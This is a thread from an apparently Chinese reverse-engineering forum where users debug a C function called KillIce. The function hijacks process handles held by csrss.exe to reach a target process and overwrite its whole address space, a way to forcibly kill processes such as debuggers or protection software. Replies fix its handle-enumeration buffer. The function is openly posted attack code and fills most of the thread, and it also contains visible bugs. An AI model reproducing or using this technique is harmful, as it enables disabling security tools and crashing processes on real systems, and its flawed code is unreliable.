能力值:
( LV12,RANK:1010 )
|
-
-
2 楼
没遇到过. 或者被HOOK了,或者你没权限,或者 (申请的内存不够)...?
不懂~
|
能力值:
( LV8,RANK:130 )
|
-
-
3 楼
你相关的代码要贴出来才好分析
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
这也不是我写的,好像就是来自这里的
void KillIce(ULONG dwProcessId)
{
HMODULE hNTDLL = LoadLibrary ("ntdll");
OBJECT_ATTRIBUTES attr;
HANDLE ph, h_dup;
ULONG bytesIO;
PVOID buf;
ULONG i;
HANDLE csrss_id;
CLIENT_ID cid1;
PROCESS_BASIC_INFORMATION pbi;
PSYSTEM_HANDLE_INFORMATION h_info;
PVOID p0, p1;
ULONG sz, oldp;
ULONG NumOfHandle;
NTSTATUS ntret;
XXXZwClose ZwClose;
XXXZwOpenProcess ZwOpenProcess;
XXXZwDuplicateObject ZwDuplicateObject;
XXXZwFreeVirtualMemory ZwFreeVirtualMemory;
XXXZwWriteVirtualMemory ZwWriteVirtualMemory;
XXXZwProtectVirtualMemory ZwProtectVirtualMemory;
XXXZwAllocateVirtualMemory ZwAllocateVirtualMemory;
XXXZwQuerySystemInformation ZwQuerySystemInformation;
XXXZwQueryInformationProcess ZwQueryInformationProcess;
ZwClose = (XXXZwClose)GetProcAddress(GetModuleHandle("ZwClose"), "ZwClose");
ZwOpenProcess = (XXXZwOpenProcess)GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwOpenProcess");
ZwDuplicateObject = (XXXZwDuplicateObject)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwDuplicateObject");
ZwFreeVirtualMemory = (XXXZwFreeVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwFreeVirtualMemory");
ZwWriteVirtualMemory = (XXXZwWriteVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwWriteVirtualMemory");
ZwProtectVirtualMemory = (XXXZwProtectVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwProtectVirtualMemory");
ZwAllocateVirtualMemory = (XXXZwAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwAllocateVirtualMemory");
ZwQuerySystemInformation = (XXXZwQuerySystemInformation)GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation");
ZwQueryInformationProcess = (XXXZwQueryInformationProcess)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQueryInformationProcess");
csrss_id = (HANDLE)GetPidByName("csrss.exe");
attr.Length = sizeof(OBJECT_ATTRIBUTES);
attr.RootDirectory = 0;
attr.ObjectName = 0;
attr.Attributes = 0;
attr.SecurityDescriptor = 0;
attr.SecurityQualityOfService = 0;
cid1.UniqueProcess = csrss_id;
cid1.UniqueThread = 0;
ZwOpenProcess(&ph, PROCESS_ALL_ACCESS, &attr, &cid1);
bytesIO = 0x4000000;
ZwAllocateVirtualMemory(GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE);
ntret=ZwQuerySystemInformation(SystemHandleInformation, buf, 0x4000000, &bytesIO);
NumOfHandle = (ULONG)buf;
h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);
for (i= 0 ; i<NumOfHandle; i++, h_info++)
{
if ((h_info->ProcessId == (ULONG)csrss_id)&&(h_info->ObjectTypeNumber == 5))
{
if (ZwDuplicateObject(ph, (PHANDLE)h_info->Handle, (HANDLE)-1, &h_dup,
0, 0, DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS)
ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO);
if (pbi.UniqueProcessId == dwProcessId)
{
for (i = 0x1000; i<0x80000000; i = i + 0x1000)
{
p0 = (PVOID)i;
p1 = p0;
sz = 0x1000;
if (ZwProtectVirtualMemory(h_dup, &p1, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS)
ZwWriteVirtualMemory(h_dup, p0, buf, 0x1000, &oldp);
}
ZwClose(h_dup);
break;
}
}
}
bytesIO = 0;
ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE);
FreeLibrary(hNTDLL);
}
|
能力值:
( LV8,RANK:130 )
|
-
-
5 楼
用这个试试
LPVOID GetSystemHandleInfomation()
{
ULONG ulSize = 0x8000;
ULONG ulRequired;
LPVOID pvBuffer;
NTSTATUS Status;
do {
pvBuffer = HeapAlloc(GetProcessHeap(), 0, ulSize);
if (!pvBuffer)
{
return NULL;
}
Status = NtQuerySystemInformation(SystemHandleInformation,
pvBuffer,
ulSize,
&ulRequired);
if (Status == STATUS_INFO_LENGTH_MISMATCH)
{
HeapFree(GetProcessHeap(), 0, pvBuffer);
ulSize *= 2;
}
} while(Status == STATUS_INFO_LENGTH_MISMATCH);
if (NT_SUCCESS(Status))
{
return pvBuffer;
}
HeapFree(GetProcessHeap(), 0, pvBuffer);
return NULL;
}
|
能力值:
( LV9,RANK:610 )
|
-
-
6 楼
缓冲区太小了吧
|
能力值:
( LV3,RANK:30 )
|
-
-
7 楼
貌似缓冲区要动态申请的才行
|
能力值:
( LV6,RANK:90 )
|
-
-
8 楼
通常这类问题都是由指针问题引起的吧
|
能力值:
( LV2,RANK:10 )
|
-
-
9 楼
感谢5L的高人,问题解决了,呵呵
|
